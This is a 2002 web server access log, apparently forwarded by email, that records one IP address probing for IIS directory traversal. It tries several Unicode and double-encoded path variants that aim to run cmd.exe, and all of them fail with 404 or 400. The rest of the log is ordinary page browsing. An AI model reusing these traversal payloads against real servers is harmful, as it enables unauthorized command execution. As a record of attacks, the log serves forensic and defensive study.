207.235.88.131 - - [27/Jan/2002:23:09:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.235.88.131 - - [27/Jan/2002:23:10:00 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.235.88.131 - - [27/Jan/2002:23:10:02 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.235.88.131 - - [27/Jan/2002:23:10:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.235.88.131 - - [27/Jan/2002:23:10:11 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.235.88.131 - - [27/Jan/2002:23:10:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.235.88.131 - - [27/Jan/2002:23:10:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.235.88.131 - - [27/Jan/2002:23:10:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.235.88.131 - - [27/Jan/2002:23:10:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.159.185.216 - - [28/Jan/2002:20:01:59 -0500] "GET / HTTP/1.1" 200 3908
207.159.185.216 - - [28/Jan/2002:20:01:59 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.185.216 - - [28/Jan/2002:20:02:05 -0500] "GET /pass.html HTTP/1.1" 200 541
207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /checkarhsccxxxx.html HTTP/1.1" 200 170
207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /scores.html HTTP/1.1" 200 3835
207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 304 -
207.159.185.216 - - [28/Jan/2002:20:02:21 -0500] "GET /time/9.23.00.html HTTP/1.1" 200 1687
207.159.185.216 - - [28/Jan/2002:20:02:21 -0500] "GET /time/pic/run.gif HTTP/1.1" 404 296
--End of acess log---
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .
Jan. 29, 2002